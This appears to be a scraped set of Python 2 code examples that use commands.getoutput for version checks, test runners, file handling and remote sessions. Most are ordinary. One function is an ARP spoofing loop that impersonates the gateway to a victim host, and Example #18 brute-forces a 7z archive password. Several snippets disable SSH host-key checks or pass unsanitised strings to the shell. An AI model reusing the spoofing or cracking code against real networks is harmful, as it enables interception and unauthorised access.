Example #1
 def checkJavaVersion(self):
     javaVersion = commands.getoutput("%s -version" % self.java)
     pattern = re.compile("java\s*version\s*\"([\d\._]+)",re.S)
     match = pattern.match(javaVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 1 or (int(number[0]) == 1 and int(number[1]) < 6):
             self.info = "your jdk version is lower than recommendation"
         elif int(number[0]) == 1 and int(number[1]) == 6:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your jdk version is higher than recommendation"
     else: self.versionNo = "unknown"
     pattern = re.compile("openjdk")
     match = pattern.match(javaVersion)
     if match:
         self.info = "openjdk is not supported"
         self.flag = "FAIL"
     jdkBit = commands.getoutput("file -bL %s" % self.java)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(jdkBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("jdk",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
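Note: the commands module used throughout these examples is Python 2 only; it was removed in Python 3, where subprocess covers the same ground. A minimal sketch of the version probe above using subprocess (java_path stands in for self.java and is only a placeholder):

import re
import subprocess

# "java -version" writes to stderr, so stderr is merged into the captured output.
java_path = "java"
out = subprocess.run([java_path, "-version"], stdout=subprocess.PIPE,
                     stderr=subprocess.STDOUT, universal_newlines=True).stdout
match = re.search(r'version\s*"([\d._]+)"', out)
version_no = match.group(1) if match else "unknown"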
Example #2
  def show(self,*list):

    # create tmp.pdb with atom data
    
    n = list[0]
    self.pdb.single(n,"tmp.pdb")

    # if RasMol input script specified, read it
    # replace load pdb "file" with load pdb "%s"
    # if no RasMol input script specified, use rasmol_template

    if len(list) == 2:
      rasmol_text = open(list[1],"r").read()
      rasmol_text = re.sub('load pdb ".*"','load pdb "%s"',rasmol_text)
    else:
      rasmol_text = rasmol_template

    # write rasmol_text to tmp.rasmol, substituting tmp.pdb for filename
    
    f = open("tmp.rasmol","w")
    text = rasmol_text % "tmp.pdb"
    print >>f,text
    f.close()

    # run RasMol to create image in tmp.gif
    
    self.start()
    self.__call__("source tmp.rasmol")
    self.__call__("write tmp.gif")
    self.stop()

    # display the image
    
    cmd = "%s tmp.gif" % (PIZZA_DISPLAY)
    commands.getoutput(cmd)
Example #3
def dotest(path, python, results):
    if not os.path.exists(path):
        return
    if os.path.isdir(path):
        abs_path = os.path.abspath(path)
        for p in os.listdir(abs_path):
            dotest(os.path.join(abs_path,p), python, results)
    else:
        case_path = os.path.abspath(path)
        if case_path.endswith('.yaml'):
            commands.getoutput('%s data2case.py %s' % (python, case_path))
            c_path, c_name = os.path.split(case_path)
            c_name = c_name[:-len('.yaml')]  # strip the .yaml suffix (rstrip would strip characters, not a suffix)
            print 'CASE %s is running ......' % c_name 
            output, errput= execmd('%s %s.py'%(python, case_path.split('.yaml')[0]))
            os.system('rm -f %s.py'%case_path.split('.yaml')[0])
            tmp = errput.split('\n')
            if tmp[-2] != 'OK':
                tmp[2] = 'FAIL: %s' % c_name
                results[c_name] = 'FAIL'
                print ''.join(['CASE %s ...... ', colorPrintMessage('r', 'FAIL')]) % c_name
                writeTempLog(c_name, output + '\n'.join(tmp[1:-5])+ '\n')
            else:
                results[c_name] = 'PASS'
                print ''.join(['CASE %s ...... ', colorPrintMessage('g', 'PASS')]) % c_name
Example #4
 def checkGccVersion(self):
     gccVersion = commands.getoutput("%s -v" % self.gcc)
     pattern = re.compile(".*gcc\s*version\s*([\d\.]+)",re.S)
     match = pattern.match(gccVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 4 \
            or (int(number[0]) == 4 and int(number[1]) < 4) \
            or (int(number[0]) == 4 and int(number[1]) == 4 and int(number[2]) < 3):
             self.info = "your gcc version is lower than recommendation"
         elif int(number[0]) == 4 and int(number[1]) == 4 and int(number[2]) == 3:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your gcc version is higher than recommendation"
     else: self.versionNo = "unknown"
     gccBit = commands.getoutput("file -bL %s" % self.gcc)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(gccBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("gcc",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
 def _setScenesToAuto(self):
     commands.getoutput('adb shell input swipe 530 6 523 22')
     time.sleep(1)
     d.click(300,185)
     time.sleep(1)
     d.click(710,282)
     time.sleep(1)
def _arpFlood(iface, target):
    conf.iface = iface
    target = target
    pkt = ARP()

    gateway = commands.getoutput("ip route list | grep default").split()[2][0:]
    pkt.psrc = gateway

    pkt.pdst = target

    mac_address = commands.getoutput("ifconfig " + iface).split()[4][0:]
    pkt.hwsrc = mac_address
    
    time.sleep(2)
    print ""
    print "[+] Interface\t\t : %s" % iface
    print "[+] Your Mac Address\t : %s" % mac_address
    print "[+] Gateway\t\t : %s" % gateway
    print "[+] Victim IP Address to : %s" % target
    print "\n[-] CTRL+C to Exit"
    try:
        while 1:
            send(pkt, verbose=0)
            time.sleep(0.5)
    except:
        print '\n[-] Process Stopped'
Example #7
 def parse_len(self):
     if self.traj_fn.endswith(".pdb"): # pdb trajectory
         return int(commands.getoutput("awk '/^MODEL /' %s | wc -l" % self.traj_fn).split()[0])
     elif self.traj_fn.endswith(".pdb.gz"): # pdb trajectory
         return int(commands.getoutput("zcat %s | awk '/^MODEL /' | wc -l" % self.traj_fn).split()[0])
     else: # list of pdb files
         return int(commands.getoutput("wc -l %s" % self.traj_fn).split()[0])
Example #8
def dumpOutput(filename):
    """ dump an extract from an ascii file """

    ret = ""
    if os.path.exists(filename):
        fsize = os.path.getsize(filename)
        tolog("Filename : %s" % (filename))
        tolog("File size: %s" % str(fsize))
        if fsize > 2**14: # 16k
            tolog("Begin output (first and last 8k)............................................")
            ret = commands.getoutput("head --bytes=8192 %s" % filename)
            if ret == "":
                tolog("[no output?]")
            else:
                # protect against corrupted files containing illegal chars
                try:
                    tolog(str(ret))
                except Exception, e:
                    tolog("!!WARNING!!3000!! Could not dump file: %s" % str(e))
            tolog("\n.... [snip] ....\n")
            ret = commands.getoutput("tail --bytes=8192 %s" % filename)
            if ret == "":
                tolog("[no output?]")
            else:
                # protect against corrupted files containing illegal chars
                try:
                    tolog(str(ret))
                except Exception, e:
                    tolog("!!WARNING!!3000!! Could not dump file: %s" % str(e))
Example #9
    def get_disk_usage(self):
        """
        Function return cpu usage on node.
        """
        ret_list = []
        cmd = "df -l | grep -v ^Filesystem "
        result = commands.getoutput(cmd)
        for item in result.splitlines():
            ret_list.append({})    

        col = ("source", "size", "avail", "pcent", "target")
        for item_col in col:
            i = 0
            cmd = "df -l --output=%s | awk 'NR>1 {print $0}'" % item_col
            result = commands.getoutput(cmd)
            for item in result.splitlines():
                ret_list[i][item_col] = item.strip()
                i += 1

        logger.debug(ret_list)
        #delete tmpfs: delete the one that does not begin with '/'
        for index in range(len(ret_list)-1, -1, -1):
            if re.match('/', ret_list[index]["source"]) is None:
                del(ret_list[index])
            else:
                #add column: util
                cmd = "iostat -x %s | grep  -A1 util | tail -1 | awk '{print $NF}' " % ret_list[index]["source"]
                result = commands.getoutput(cmd)
                ret_list[index]['util'] = float(result)*100
                #delete character '%'
                ret_list[index]['pcent'] = ("%.2f" % float(ret_list[index]['pcent'][:-1]))
            
        return ret_list
Example #10
def analyzeoutput_default(st, jobdir):

    jobstat = 0
    if st != 0:
        print "ERROR: trivialPilot: Job script failed. Status=%s" % st
        print "======== Job script run.sh content:"
        print commands.getoutput('cat run.sh')
    else:
        print "!!INFO!!0!!Job script completed OK. Status=0"
    errcodes = commands.getoutput("grep '!!FAILED!!' %s/job.out"%jobdir)
    if len(errcodes) > 0:
        print "---- Synposis of FAILED messages in job:"
        print errcodes
    warncodes = commands.getoutput("grep '!!WARNING!!' %s/job.out"%jobdir)
    if len(warncodes) > 0:
        print "---- Synposis of WARNING messages in job:"
        print warncodes
    infocodes = commands.getoutput("grep '!!INFO!!' %s/job.out"%jobdir)
    if len(infocodes) > 0:
        print "---- Synposis of INFO messages in job:"
        print infocodes
    pat = re.compile('.*!!FAILED!!([0-9]+)!!(.*)$')
    mat = pat.search(errcodes)
    if mat:
        jobstat = 1
    return jobstat
 def __generateAllGraphicsForGroups( self, graphicType ):
     """
         
         @summary : Generated groups graphics based on the 
                    specified graphicType.
         
         @summary graphicType : "daily", "weekly", "monthly", "yearly"
         
         @raise Exception: When graphicType is unknown.
                    
     """
     
     configParameters = StatsConfigParameters( )
     configParameters.getAllParameters()       
         
     supportedGraphicTypes = { "daily": "-d", "weekly":"-w", "monthly":"-m", "yearly":"-y" }
     
     if graphicType not in supportedGraphicTypes:
         raise Exception( "Unsupported graphicType detected in __generateAllGraphicsForGroups" )
     
     else: 
         
         for group in configParameters.groupParameters.groups:
             
             groupMembers, groupMachines, groupProducts, groupFileTypes = configParameters.groupParameters.getAssociatedParametersInStringFormat( group )
             
             groupMachines = str(groupMachines).replace( "[", "" ).replace( "]", "" ).replace( "'", "" ).replace( '"','' )
              
             if graphicType == "daily":
                 commands.getstatusoutput( '%sgenerateGnuGraphics.py -g %s -c %s --combineClients --copy -d "%s"  -m %s -f %s -p %s  -s 24 --outputLanguage %s' %( self.paths.STATSBIN, group, groupMembers, self.timeOfRequest, groupMachines, groupFileTypes, groupProducts, self.outputLanguage ) )
                 #print  '%sgenerateGnuGraphics.py -g %s -c %s --combineClients --fixedCurrent --copy -d "%s"  -m %s -f %s -p %s  -s 24 --language %s' %( self.paths.STATSBIN, group, groupMembers, self.timeOfRequest, groupMachines, groupFileTypes, groupProducts, self.outputLanguage )
             
             else:    
                 commands.getoutput("%sgenerateRRDGraphics.py %s --copy -f %s --machines '%s'  -c %s --date '%s' --fixedCurrent --language %s" %( self.paths.STATSBIN, supportedGraphicTypes[ graphicType], groupFileTypes, groupMachines, group, self.timeOfRequest, self.outputLanguage ) )
                 print "%sgenerateRRDGraphics.py %s --copy -f %s --machines '%s'  -c %s --date '%s' --fixedCurrent --language %s" %( self.paths.STATSBIN, supportedGraphicTypes[ graphicType], groupFileTypes, groupMachines, group, self.timeOfRequest, self.outputLanguage )    
def parse_log(results_filename):
    """
    Parse the log file from a results packet.

    ARGUMENTS

    results_filename (string) - name of compressed results file to test

    RETURNS

    logtext - text of log file
    logdata - dict of important log contents

    """

    # Create temporary directory.
    import os, os.path, tempfile, shutil

    cwd = os.getcwd()
    tmpdir = tempfile.mkdtemp()

    # Extract source directory.
    [directory, filename] = os.path.split(results_filename)

    # Copy results to temporary directory.
    shutil.copyfile(results_filename, os.path.join(tmpdir, "results.tar.bz2"))

    # Change to temporary directory.
    os.chdir(tmpdir)

    # Extract payload and results.
    import commands

    command = "bzcat results.tar.bz2 | tar x"
    commands.getoutput(command)

    # Read log file.
    log_filename = "log.txt"
    logtext = read_file(log_filename)

    # Extract useful info from log file.
    logdata = dict()
    import re

    for line in logtext.split("\n"):
        m = re.match("^(.+?):(.+)", line)
        if m:
            groups = m.groups()
            key = groups[0].strip()
            value = groups[1].strip()
            logdata[key] = value
            # TODO: Add support for values that can span multiple lines, like Options and Args.

    # Clean up temporary directory.
    os.chdir(cwd)
    for filename in os.listdir(tmpdir):
        os.unlink(os.path.join(tmpdir, filename))
    os.removedirs(tmpdir)

    return (logtext, logdata)
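The shell pipeline "bzcat results.tar.bz2 | tar x" above can also be handled by the standard tarfile module, which avoids spawning a shell; a minimal sketch under that assumption, reusing the same file name:

import tarfile

# Extract the payload in-process instead of via bzcat | tar x.
with tarfile.open("results.tar.bz2", "r:bz2") as tar:
    tar.extractall()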
Example #13
def endJob(pid, state, jobstat):
    data = {}
    data['node'] = host
    data['siteName'] = site
    data['jobId'] = pid
    data['schedulerID'] = schedid
    data['pilotID'] = os.environ.get('GTAG', tpid)
    data['state'] = state
    data['timestamp'] = utils.timeStamp()
    data['transExitCode'] = jobstat
    data['computingElement'] = qname

    print "== Updating Panda with completion info"
    status, pars, response = utils.toServer(baseURLSSL,'updateJob',data,os.getcwd())
    if status != 0:
        print "Error contacting dispatcher to update job status: return value=%s" % status
    else:
        if jobstat == 0:
            print "==== PandaID %s successful completion reported to dispatcher" % pid
            print "!!FINISHED!!0!!PandaID %s done" % pid
        else:
            print "==== PandaID %s failed completion reported to dispatcher" % pid
            print "!!FAILED!!2999!!PandaID %s done" % pid
    print "==== Directory at job completion:"
    print commands.getoutput('pwd; ls -al')
def thumb_create (images, width=100, height=100):
    ret = 0
    for src, dst in images:
        try:
            w, h = commands.getoutput ('identify ' + src).split ()[2].split ('x')
            w, h, l, t = int (w), int (h), 0, 0

            if w > h:
                l = round ((w - h) / 2)
                w = h
            elif h > w:
                t = round ((h - w) / 2)
                h = w

            commands.getoutput ('convert -crop %dx%d+%d+%d %s %s' % (w, h, l, t, src, dst))
            commands.getoutput ('convert -resize %dx%d %s %s' % (width, height, dst, dst))
#             commands.getoutput ('convert -blur 15 %s %s' % (dst, dst + '.jpg'))
            ret += 1
        except:
            try:
                if os.path.isfile (dst):
                    os.remove (dst)
            except:
                pass

    return ret
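The identify/convert calls in thumb_create shell out to ImageMagick once per image. A rough in-process alternative using Pillow is sketched below; Pillow is not used by the original code, so this is only an assumed equivalent, and thumb_create_pillow is a hypothetical name:

import os
from PIL import Image

def thumb_create_pillow(images, width=100, height=100):
    # Center-crop each source image to a square, resize it, and save it to dst.
    ret = 0
    for src, dst in images:
        try:
            im = Image.open(src)
            w, h = im.size
            side = min(w, h)
            left = (w - side) // 2
            top = (h - side) // 2
            im.crop((left, top, left + side, top + side)).resize((width, height)).save(dst)
            ret += 1
        except Exception:
            try:
                if os.path.isfile(dst):
                    os.remove(dst)
            except OSError:
                pass
    return ret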
Example #15
 def iq_getiso(self, iq):
     """
     Get the virtual cdrom ISO of the virtual machine
     
     @type iq: xmpp.Protocol.Iq
     @param iq: the received IQ
     
     @rtype: xmpp.Protocol.Iq
     @return: a ready to send IQ containing the result of the action
     """
     try:
         nodes = []
     
         isos = commands.getoutput("ls " + self.entity.folder).split()
         for iso in isos:
             if commands.getoutput("file " + self.entity.folder + "/" + iso).lower().find("iso 9660") > -1:
                 node = xmpp.Node(tag="iso", attrs={"name": iso, "path": self.entity.folder + "/" + iso })
                 nodes.append(node)
     
         sharedisos = commands.getoutput("ls " + self.shared_isos_folder).split() 
         for iso in sharedisos:
             if commands.getoutput("file " + self.shared_isos_folder + "/" + iso).lower().find("iso 9660") > -1:
                 node = xmpp.Node(tag="iso", attrs={"name": iso, "path": self.shared_isos_folder + "/" + iso })
                 nodes.append(node)
     
         reply = iq.buildReply("result")
         reply.setQueryPayload(nodes)
         self.entity.log.info("info about iso sent")
     except Exception as ex:
         reply = build_error_iq(self, ex, iq, ARCHIPEL_ERROR_CODE_DRIVES_GETISO)
     return reply
Example #16
def shout(word, word_eol, userdata):
     global bold_char, audtool_prog
     current = xchat.get_context()
     if audacious_check():
     #playing?
         playing = commands.getstatusoutput(audtool_prog + " playback-playing")
         if (playing[0] == 0):
             song = commands.getoutput(audtool_prog + " current-song")
             artist = commands.getoutput(audtool_prog + " current-song-tuple-data artist")

             total = commands.getoutput(audtool_prog + " current-song-length")
             output = commands.getoutput(audtool_prog + " current-song-output-length")
             final = bold_char + "Now Playing: " + bold_char + song + (" - ") + artist + " (" + output + "/" + total + ")"
             #make sure it's not in a server window
             if ((current.get_info("channel") != current.get_info("server")) and (current.get_info("channel") != current.get_info("network"))):
                 #Say it.
                 xchat.command("msg " + current.get_info("channel") + " " + final)
             else:
                 #Print it
                 current.prnt(final)
         else:
             current.prnt("Check that Audacious is playing!")
     else:
         current.prnt("Check that you have Audacious installed and audtool_prog set properly!")
     #accept the command no matter what happens, to prevent unknown command messages
     return xchat.EAT_XCHAT
Example #17
    def detener_grabacion(self, widget=None):

        if self.info_grabar.label.get_text() == _("Stopped recording"):
            return

        estado = str(self.mplayer_server.get_estado())
        self.activar(None, "stop")

        try:
            self.mplayer_server.mplayer.kill()
            self.graba.kill()

        except:
            pass

        commands.getoutput('killall mplayer')
        self.origenes_de_datos.set_permisos()
        self.graba = None
        self.info_grabar.detenido()
        self.mplayer_server = Mplayer_Reproductor(self.pantalla.window.xid)
        self.mplayer_server.connect("cambio_estado", self.cambio_estado)
        self.mplayer_server.connect("update_progress", self.update_progress)
        self.mplayer_server.connect("video", self.video)
        #self.mplayer_server.connect("mplayer_info", self.mplayer_info)

        if "playing" in estado:
            self.activar(None, "pausa-play")
Example #18
def test_cmd(p):
    try:
        zpath = '~/Desktop'
        target = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
        #~ for i in target:
            #~ pass

        #~ cmd = "7z l ~/Desktop/desttree.7z -p" + p
        cmd = "7z l ~/Pictures/IMGS.7z -p" + p
        output = commands.getstatusoutput(cmd)  # returns (status, output)
        #~ outputs = commands.getoutput(cmd)    # returns output only
        if output[0] == 0:
            logcmd = 'echo ' + cmd + ' >> ' + zpath + '/' + target
            commands.getoutput(logcmd)
            dt = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            print 'End. Now, it is ' + dt
            return 'Done. PASSWORD is ' + p
        else:
            return 0

        #~ print "GET STATUS OUT PUT: " , output
        #~ print "GET OUT PUT: %s" % outputs
    except Exception, e:
        print e
        return 0
Example #19
def run_condor_jobs(c, config_file, subject_list_file, p_name):
    '''
    '''

    # Import packages
    import commands
    from time import strftime

    try:
        sublist = yaml.load(open(os.path.realpath(subject_list_file), 'r'))
    except:
        raise Exception ("Subject list is not in proper YAML format. Please check your file")

    cluster_files_dir = os.path.join(os.getcwd(), 'cluster_files')
    subject_bash_file = os.path.join(cluster_files_dir, 'submit_%s.condor' % str(strftime("%Y_%m_%d_%H_%M_%S")))
    f = open(subject_bash_file, 'w')

    print >>f, "Executable = /usr/bin/python"
    print >>f, "Universe = vanilla"
    print >>f, "transfer_executable = False"
    print >>f, "getenv = True"
    print >>f, "log = %s" % os.path.join(cluster_files_dir, 'c-pac_%s.log' % str(strftime("%Y_%m_%d_%H_%M_%S")))

    sublist = yaml.load(open(os.path.realpath(subject_list_file), 'r'))
    for sidx in range(1,len(sublist)+1):
        print >>f, "error = %s" % os.path.join(cluster_files_dir, 'c-pac_%s.%s.err' % (str(strftime("%Y_%m_%d_%H_%M_%S")), str(sidx)))
        print >>f, "output = %s" % os.path.join(cluster_files_dir, 'c-pac_%s.%s.out' % (str(strftime("%Y_%m_%d_%H_%M_%S")), str(sidx)))

        print >>f, "arguments = \"-c 'import CPAC; CPAC.pipeline.cpac_pipeline.run( ''%s'',''%s'',''%s'',''%s'',''%s'',''%s'',''%s'')\'\"" % (str(config_file), subject_list_file, str(sidx), c.maskSpecificationFile, c.roiSpecificationFile, c.templateSpecificationFile, p_name)
        print >>f, "queue"

    f.close()

    #commands.getoutput('chmod +x %s' % subject_bash_file )
    print commands.getoutput("condor_submit %s " % (subject_bash_file))
Example #20
 def test_TypeMax_Overflow(self):
     """
     Testing UINT8 parameter value out of positive range
     ---------------------------------------------------
         Test case description :
         ~~~~~~~~~~~~~~~~~~~~~~~
             - set UINT8 to 101
         Tested commands :
         ~~~~~~~~~~~~~~~~~
             - [setParameter] function
         Used commands :
         ~~~~~~~~~~~~~~~
             - [getParameter] function
         Expected result :
         ~~~~~~~~~~~~~~~~~
             - error detected
             - UINT8 parameter not updated
             - Blackboard and filesystem values checked
     """
     log.D(self.test_TypeMax_Overflow.__doc__)
     log.I("UINT8 parameter max value out of bounds = 101")
     value = "101"
     param_check = commands.getoutput('cat $PFW_RESULT/UINT8')
     #Set parameter value
     out, err = self.pfw.sendCmd("setParameter", self.param_name, value)
     assert err == None, log.E("when setting parameter %s : %s"
                               % (self.param_name, err))
     assert out != "Done", log.F("PFW : Error not detected when setting parameter %s out of bounds"
                                 % (self.param_name))
     #Check parameter value on filesystem
     assert commands.getoutput('cat $PFW_RESULT/UINT8') == param_check, log.F("FILESYSTEM : Forbidden parameter change")
     log.I("test OK")
Example #21
    def _cvs_release(self):
        """
        Sync spec file/patches with CVS, create tags, and submit to brew/koji.
        """

        self._verify_cvs_module_not_already_checked_out()

        print("Building release in CVS...")
        commands.getoutput("mkdir -p %s" % self.working_dir)
        debug("cvs_branches = %s" % self.cvs_branches)

        self.cvs_checkout_module()
        self.cvs_verify_branches_exist()

        # Get the list of all sources from the builder:
        self.builder.tgz()

        self.cvs_sync_files()

        # Important step here, ends up populating several important members
        # on the builder object so some of the below lines will not work
        # if moved above this one.
        self.cvs_upload_sources()

        self._cvs_user_confirm_commit()

        self._cvs_make_tag()
        self._cvs_make_build()
Example #22
def getCatalog(folder,corr):
    
    if not os.path.isdir(folder):
        catalog_plus  = ''        
        catalog_minus = ''
        
        print 'ERROR: DATA folder %s does not exist: the plots will not have data points' % folder
        exit(1)

    catalog_plus  = commands.getoutput("ls %s | grep -i %s | grep  plus" % (folder, corr) ).split()
    catalog_minus = commands.getoutput("ls %s | grep -i %s | grep minus" % (folder, corr) ).split()
    
    if len(catalog_plus)==0:
        print "ERROR (getCatalog): no positive kick response measurements"
        exit(1)

    if len(catalog_minus)==0:
        print "ERROR (getCatalog): no negative kick response measurements"
        exit(1)

    if len(catalog_plus)!=len(catalog_minus):
        print "ERROR (getCatalog): different number of positive and negative kick response measurements"
        print "len(catalog_plus)=%d" % len(catalog_plus)
        print "len(catalog_minus)=%d" % len(catalog_minus)
        exit(1)
        
    return catalog_plus,catalog_minus
Example #23
def remote_session_scp(send_file='/bin/ls'):
   
    """ Create remote session copy file. 
        scp 100M file spend 200s, the spead is 0.5MB
    eg. $>scp xxx root@ip:/root/
    """

    F_ret = 0
    try:
        index = 0

        if download:
            run_cmd = 'scp -o "StrictHostKeyChecking=no" -o "GSSAPIAuthentication=no" root@%s:%s .' % (remote_ip, send_file)
        else:
            run_cmd = 'scp -o "StrictHostKeyChecking=no" -o "GSSAPIAuthentication=no" %s root@%s:/root/' % (send_file, remote_ip)

        print_debug(run_cmd)
        warning = 'WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!'
        for i in range(1,10):
            remote_session  = pexpect.spawn(run_cmd)
            remote_session.logfile = sys.stdout
            index = remote_session.expect(['[Pp]assword:\s+', warning, pexpect.EOF], timeout=120)
            if index == 1:
                commands.getoutput('rm -rf ~/.ssh/known_hosts')
                remote_session.terminate()
            else:
                break
        if index == 0:
            remote_session.sendline('%s' % root_password)
        index = remote_session.expect_exact(['100%', pexpect.EOF], timeout=1800)
        if index != 0:
            F_ret += 1
    except Exception,e:
        print  'remote_session_scp (%s) -> unexpected issue: %s' % (send_file,e)
        F_ret += 1
Example #24
def backUpVM(uuid, xs_name):
	'''
	backs up a single VM with uuid=/UUID/OF/VM and xs_name=/NAME/OF/VM
	using the following methodology:
		1) checks and ejects dvd from vm if necessary
		2) takes snapshot of VM
		3) removes any lingering copies
		4) backup vm from snapshot
		5) fixes permissions
		6) deletes snapshot we created...we are not slobs
	'''
#	need to run as root
	env.user='******'
	env.key_filename = "/root/.ssh/id_rsa"
	today = str(datetime.date.today())
#	determine start time
	stime = time.time()
#	cast variables as strings to protect from spaces
	uuid = str(uuid)
	xs_name = re.escape(str(xs_name))
#	dates for file names
#	gets dates for file/folder name
	year = datetime.date.today().strftime("%Y")
	month = datetime.date.today().strftime("%m")
	day = datetime.date.today().strftime("%d")
#	gets the sr base path
	sr_base = '/var/run/sr-mount'
	sr_uuid = str(run('xe sr-list tags=backup-sr | grep uuid | cut -f2 -d":" | tr -d [:blank:]'))
	filename =  str(sr_base + '/' + sr_uuid + '/'+ year + '/' + month + '-' + day + '/' + xs_name +  ".xva")
	#this ejects any cd
	dvdstate = run('xe vm-cd-list uuid='+ uuid + ' | grep "empty ( RO)" | awk \'{print $4}\'')
	if dvdstate == "false":
		print 'removing any cd\'s from: ', xs_name
		run('xe vm-cd-eject vm=' + xs_name)
	#this deletes existsing backup if named same
	print 'filename: ', filename
	print 'running initial snapshot'
#	this command creates a snapshot
	snapshot_vm_cmd = run('xe vm-snapshot uuid=' + uuid + ' new-name-label=' + xs_name + '-' + today)
	snapshot_uuid = str(commands.getoutput(snapshot_vm_cmd).replace("sh: 1: ","").replace(": not found",""))
	print 'done creating snapshot: ', snapshot_uuid
#	this command sets HA to NAY for template
	print 'setting template for HA to NAY'
	backup_vm_cmd = 'xe template-param-set is-a-template=false ha-always-run=false uuid=' + snapshot_uuid
	commands.getoutput(backup_vm_cmd)
	print 'done setting template options'
#	delete any lingering copies
	print 'checking if ' + filename + ' exists'
	run('rm -f ' + filename)
#	this exports the snapshot we created as a vm
	backup_vm_cmd = run('xe vm-export vm=' + snapshot_uuid + ' filename=' + filename)
	commands.getoutput(backup_vm_cmd)
	print 'done creating clone'
	run('chmod 660 ' + filename)
	etime = time.time()
	ttime = (etime - stime)
	run('echo ' + filename + '-'  + str(ttime) + ' >> ' + sr_base + '/' + sr_uuid + '/' + year + '/' + month + '-' + day + '/backup.log')
	#removing old snapshot
	run('xe snapshot-uninstall snapshot-uuid=' + snapshot_uuid + ' force=true')
	print 'does this still exist? ', snapshot_uuid
Example #25
def remote_session_run(args_cmd='ls'):
   
    """ Create remote run session. 
    eg. $>ssh root@ip 'commands'
    """

    F_ret = 0
    try:
        index = 0
        ssh_cmd = 'ssh -o "StrictHostKeyChecking=no" -o "GSSAPIAuthentication=no" '
        run_cmd = '%s root@%s \"%s\" ; echo \"echo_result=\"$?\"' % (ssh_cmd, remote_ip, args_cmd)

        warning = 'WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!'
        for i in range(1,10):
            remote_session  = pexpect.spawn(run_cmd)
            remote_session.logfile = sys.stdout
            index = remote_session.expect(['[Pp]assword:\s+', warning, pexpect.EOF], timeout=120)
            if index == 1:
                commands.getoutput('rm -rf ~/.ssh/known_hosts')
                remote_session.terminate()
            else:
                break
        if index == 0:
            remote_session.sendline('%s' % root_password)
        index = remote_session.expect_exact(['echo_result=0', pexpect.EOF], timeout=100)
        if index != 0:
            F_ret += 1
    except Exception,e:
        print  'remote_session_run (%s) -> unexpected issue: %s' % (args_cmd,e)
        F_ret += 1
Example #26
 def checkFlexVersion(self):
     flexVersion = commands.getoutput("%s --version" % self.flex)
     pattern = re.compile("flex\s*([\d\.]+)",re.S)
     match = pattern.match(flexVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 2 or (int(number[0]) == 2 and int(number[1]) < 5):
             self.info = "your flex version is lower than recommendation"
         elif int(number[0]) == 2 and int(number[1]) == 5:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your flex version is higher than recommendation"
     else: self.versionNo = "unknown"
     flexBit = commands.getoutput("file -bL %s" % self.flex)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(flexBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("flex",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
Example #27
 def checkGperfVersion(self):
     gperfVersion = commands.getoutput("%s --version" % self.gperf)
     pattern = re.compile("GNU\s*gperf\s*([\d\.]+)",re.S)
     match = pattern.match(gperfVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 3:
             self.info = "your gperf version is lower than recommendation"
         elif int(number[0]) == 3 and int(number[1]) == 0:
            self.flag = "OK"
         else:
            self.flag = "WARNING"
            self.info = "your gperf version is higher than recommendation"
     else: self.versionNo = "unknown"
     gperfBit = commands.getoutput("file -bL %s" % self.gperf)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
     match = pattern.match(gperfBit)
     if match:
         self.bit = match.group(1)
     else:
         self.bit = "unknown"
     result("gperf",self.versionNo,self.bit,self.flag,self.info)
     if self.flag == "FAIL":
         global checkResult
         checkResult = 1
def create_story_thumbnail(story, save_path):
    """ Take first page of story and create a composite image of page
        then resize it to our thumbnail size. Recall that the default
        story page is 1280x800
    """

    if not os.path.exists(save_path):
        os.makedirs(save_path)

    page = story.page_set.get(page_number=0)
    pmos = page.pagemediaobject_set.filter(media_type="image").order_by("z_index")
    comp_info = ""
    for pmo in pmos:
        if pmo.download_media_url:
            filename = save_path + os.path.split(pmo.download_media_url)[1]
            comp_info += filename + " " + " -geometry +" + str(pmo.xcoor) + "+" + str(pmo.ycoor) + " -composite "

    cmd1 = "convert -size 1280x800 xc:white " + comp_info + save_path + "thumbnail_icon_large.png"
    commands.getoutput(cmd1)

    # NOTE: this will preserve aspect ratio and result in image
    # that has an x or y no greater than STORY_THUMBNAIL_SIZE
    cmd2 = "convert -resize {0}x{0} {1}thumbnail_icon_large.png {1}thumbnail_icon.png".format(
        STORY_THUMBNAIL_SIZE, save_path
    )
    result = commands.getoutput(cmd2)

    # if result not '' then some type of error
    return True if result == "" else False
Example #29
 def checkEabiVersion(self):
     eabiVersion = commands.getoutput("%s --version" % self.eabigcc)
     pattern = re.compile("arm-linux-androideabi-gcc.*?([\d\.]+)",re.S)
     match = pattern.match(eabiVersion)
     if match:
         self.versionNo = match.group(1)
         number = self.versionNo.split(".")
         if int(number[0]) < 4 \
            or (int(number[0]) == 4 and int(number[1]) != 8): 
             self.info = "your arm-linux-androideabi-gcc version is not recommendation"
         elif int(number[0]) == 4 and int(number[1]) == 8:
            self.flag = "OK"
     else:
         self.versionNo = "unknown version"
         self.info = "eabigcc: %s \n version info: %s \n" % (self.eabigcc,eabiVersion)
     eabiBit = commands.getoutput("file -bL %s" % self.eabigcc)
     pattern = re.compile("ELF\s*(\d+)-bit\s*LSB\s*executable.*")
